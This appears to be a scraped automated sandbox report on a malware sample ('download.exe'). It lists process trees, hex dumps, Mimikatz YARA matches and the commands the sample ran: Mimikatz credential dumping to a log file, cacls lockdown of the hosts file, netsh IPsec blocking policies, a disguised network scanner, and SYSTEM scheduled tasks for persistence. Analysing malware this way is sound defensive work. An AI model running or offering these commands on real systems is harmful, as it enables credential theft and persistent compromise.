unknown 4096 41 51 0e 5a 01 ff 53 89 0b 50 3b c8 0f 8f a4 8d 63 b5 7e 00 d5 51 1a 48 79 50 04 bc a4 f2 04 59 5b 67 79 e3 09 84 09 e4 8a 03 cb 07 ff 90 1d ec db 04 69 dc 35 5a 59 37 9a ca b7 d4 16 d4 dc 05 8c 70 cc cc 83 1a e8 82 36 ec d9 68 3e 78 ab 5d bd 1c 30 40 27 f7 43 4c 24 21 84 7c 6a 2b 86 62 82 e0 97 d4 89 55 d8 25 e8 8a 05 87 9b 8d 85 e6 6e 35 a0 69 53 9c 92 f0 dc 25 11 d0 78 d0 91 b0 80 60 7b 12 82 e4 51 7b cc c6 03 20 bb 8c 70 2c 40 8e e1 fc a1 ec 51 b0 79 24 ec 8a 03 88 03 2d 01 19 88 60 15 d4 54 9a 0b 90 e8 d0 d0 d4 72 c0 f0 c8 ee 2d 58 4d 52 01 25 13 04 52 07 9c e8 f5 58 5b 59 43 99 40 19 25 87 02 0c f4 57 20 9f f9 25 b8 81 b7 51 90 96 62 15 13 01 87 d1 15 18 d0 2d cd 51 c1 a3 42 f2 89 b0 14 71 19 49 0e 72 32 00 9b 62 1d c1 88 61 5b fc 77 56 c0 12 83 f0

AQ.Z..S..P;.....c.~..Q.HyP.....Y[gy...............i.5ZY7.........p......6..h>x.]..0@'.CL$!.|j+.b.....U.%........n5.iS....%..x....`{...Q{... ..p,@.....Q.y$.....-...`..T.......r....-XMR.%..R....X[YC.@.%....W ..%...Q..b........-.Q..B....q.I.r2..b...a[.wV....

success or wait 1137 10E756C InternetReadFile





Path: C:\Windows\cc3d3243\b158ac7.exe


Commandline: C:\Windows\cc3d3243\b158ac7.exe

Imagebase: 0x400000





Yara matches: Rule: mimikatz, Description: mimikatz, Source: 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, Author: @fusionraceRule: mimikatz, Description: mimikatz, Source: 0000000B.00000002.5202663261.0000000000401000.00000040.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 0000000B.00000002.5202663261.0000000000401000.00000040.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 0000000B.00000002.5202663261.0000000000401000.00000040.sdmp, Author: @fusionrace

Analysis Process: b158ac7.exe PID: 5060 Parent PID: 1896Analysis Process: b158ac7.exe PID: 5060 Parent PID: 1896

General



Reputation: low




Path: C:\Windows\cc3d3243\b158ac7.exe


Commandline: C:\Windows\cc3d3243\b158ac7.exe

Imagebase: 0x400000





Yara matches: Rule: mimikatz, Description: mimikatz, Source: 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, Author: @fusionrace

Reputation: low


C:\Windows\5c2a55da8\ read data or list directory | synchronize



C:\Windows\5c2a55da8\Coolmaster\ read data or list directory | synchronize




Analysis Process: b158ac7.exe PID: 3356 Parent PID: 564Analysis Process: b158ac7.exe PID: 3356 Parent PID: 564

General





C:\Windows\System32\drivers\etc\hosts unknown 822 23 20 63 6f 70 79 72 69 67 68 74 20 28 63 29 20 31 39 39 33 2d 32 30 30 39 20 6d 69 63 72 6f 73 6f 66 74 20 63 6f 72 70 2e 0d 0a 23 0d 0a 23 20 74 68 69 73 20 69 73 20 61 20 73 61 6d 70 6c 65 20 68 6f 73 74 73 20 66 69 6c 65 20 75 73 65 64 20 62 79 20 6d 69 63 72 6f 73 6f 66 74 20 74 63 70 2f 69 70 20 66 6f 72 20 77 69 6e 64 6f 77 73 2e 0d 0a 23 0d 0a 23 20 74 68 69 73 20 66 69 6c 65 20 63 6f 6e 74 61 69 6e 73 20 74 68 65 20 6d 61 70 70 69 6e 67 73 20 6f 66 20 69 70 20 61 64 64 72 65 73 73 65 73 20 74 6f 20 68 6f 73 74 20 6e 61 6d 65 73 2e 20 65 61 63 68 0d 0a 23 20 65 6e 74 72 79 20 73 68 6f 75 6c 64 20 62 65 20 6b 65 70 74 20 6f 6e 20 61 6e 20 69 6e 64 69 76 69 64 75 61 6c 20 6c 69 6e 65 2e 20 74 68 65 20 69 70 20 61 64 64 72 65 73 73 20 73 68 6f 75 6c

# copyright (c) 1993-2009 microsoft corp...#..# this is a sample hosts file used by microsoft tcp/ip for windows...#..# this file contains the mappings of ip addresses to host names. each..# entry should be kept on an individual line. the ip address shoul

success or wait 1 4A4C98 WriteFile



C:\Windows\System32\drivers\etc\hosts unknown 824 success or wait 1 4A4C5F ReadFile






Commandline: cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM






Reputation: high


File ReadFile Read


General


General












Reputation: high






Commandline: C:\Windows\system32\cmd.exe /S /D /c' echo Y'






Reputation: high





Path: C:\Windows\SysWOW64\cacls.exe


Commandline: cacls C:\Windows\system32\drivers\etc\hosts /T /D users



MD5 hash: 4CBB1C027DF71C53A8EE4C855FD35B25



Reputation: low



\Device\ConDrv unknown 1 41 A success or wait 19 13649CC fprintf

\Device\ConDrv unknown 1 70 p success or wait 16 13649CC fprintf


General

Analysis Process: cacls.exe PID: 4728 Parent PID: 3968Analysis Process: cacls.exe PID: 4728 Parent PID: 3968

General








Path: C:\Windows\SysWOW64\netsh.exe


Commandline: netsh ipsec static add policy name=Bastards description=FuckingBastards

Imagebase: 0xb70000


MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807





\Device\ConDrv unknown 2 0d 0a .. success or wait 1 B77B1B WriteFile

Key Path Completion CountSourceAddress Symbol














Path: C:\Windows\SysWOW64\netsh.exe


Analysis Process: netsh.exe PID: 4864 Parent PID: 3356Analysis Process: netsh.exe PID: 4864 Parent PID: 3356

General



General

Analysis Process: netsh.exe PID: 1784 Parent PID: 3356Analysis Process: netsh.exe PID: 1784 Parent PID: 3356

General




Commandline: netsh ipsec static add filteraction name=BastardsList action=block

Imagebase: 0xb70000


MD5 hash: A0AA3322BB46BBFC36AB9DC1DBBBB807





\Device\ConDrv unknown 2 0d 0a .. success or wait 1 B77B1B WriteFile

Key Path Completion CountSourceAddress Symbol
























General


General







Commandline: cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators




















Commandline: cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM








Path: C:\Windows\Temp\sqlisrv.exe


Commandline: C:\Windows\Temp\sqlisrv.exe

Imagebase: 0x400000





General


General


General

Analysis Process: sqlisrv.exe PID: 652 Parent PID: 4080Analysis Process: sqlisrv.exe PID: 652 Parent PID: 4080

General


Yara matches: Rule: mimikatz, Description: mimikatz, Source: 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp, Author: @fusionraceRule: mimikatz, Description: mimikatz, Source: 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: hacktool_windows_mimikatz_errors, Description: Mimikatz credential dump tool: Error messages, Source: 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp, Author: @fusionraceRule: hacktool_windows_mimikatz_sekurlsa, Description: Mimikatz credential dump tool, Source: 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp, Author: @fusionrace






Commandline: cmd /c C:\Windows\5c2a55da8\Coolmaster\GogoleUpadte.exe TCP 192.168.0.1 192.168.0.255 6666 32


















Path: C:\Windows\5c2a55da8\Coolmaster\GogoleUpadte.exe



General


General

Analysis Process: GogoleUpadte.exe PID: 284 Parent PID: 4068Analysis Process: GogoleUpadte.exe PID: 284 Parent PID: 4068

General



Commandline: C:\Windows\5c2a55da8\Coolmaster\GogoleUpadte.exe TCP 192.168.0.1 192.168.0.255 6666 32

Imagebase: 0xf90000


MD5 hash: 821EA58E3E9B6539FF0AFFD40E59F962







Commandline: cmd /c C:\Windows\5c2a55da8\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\5c2a55da8\Corporate\log.txt










Commandline: cmd /c cd C:\Windows\5c2a55da8\usbprohub\ & C:\Windows\5c2a55da8\usbprohub\\ouousbpro.exe

















General


General


General















Path: C:\Windows\5c2a55da8\Corporate\vfshost.exe


Commandline: C:\Windows\5c2a55da8\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit

Imagebase: 0x7ff607270000


MD5 hash: FD5EFCCDE59E94EEC8BB2735AA577B2B



Yara matches: Rule: mimikatz, Description: mimikatz, Source: 00000024.00000002.6192286869.00007FF607342000.00000040.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: Powerkatz_DLL_Generic, Description: Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible), Source: 00000024.00000002.6190697970.00007FF607271000.00000040.sdmp, Author: Florian RothRule: mimikatz, Description: mimikatz, Source: 00000024.00000001.6149235365.00007FF607342000.00000080.sdmp, Author: Benjamin DELPY (gentilkiwi)Rule: Powerkatz_DLL_Generic, Description: Detects Powerkatz - a Mimikatz version prepared to run in memory via Powershell (overlap with other Mimikatz versions is possible), Source: 00000024.00000001.6146216390.00007FF607301000.00000080.sdmp, Author: Florian Roth



Path: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe


Commandline: C:\Windows\5c2a55da8\usbprohub\\ouousbpro.exe

Imagebase: 0x3c0000


MD5 hash: C02C8BE9AFC220F8B7852C619AF784C6



General

Analysis Process: vfshost.exe PID: 4240 Parent PID: 1252Analysis Process: vfshost.exe PID: 4240 Parent PID: 1252

General

Analysis Process: ouousbpro.exe PID: 2940 Parent PID: 1524Analysis Process: ouousbpro.exe PID: 2940 Parent PID: 1524

General



Disassembly

Code Analysis





Commandline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn '93293e638' /ru system /tr 'cmd /c C:\Windows\ime\b158ac7.exe'










Commandline: cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn 'd95544aa8' /ru system /tr 'cmd /c echo Y|cacls C:\Windows\cc3d3243\b158ac7.exe /p everyone:F'
















General


General


General


Date post:	19-Mar-2023
Category:	Documents
Upload:	khangminh22
View:	0 times
Download:	0 times

Automated Malware Analysis Report for download.exe

Documents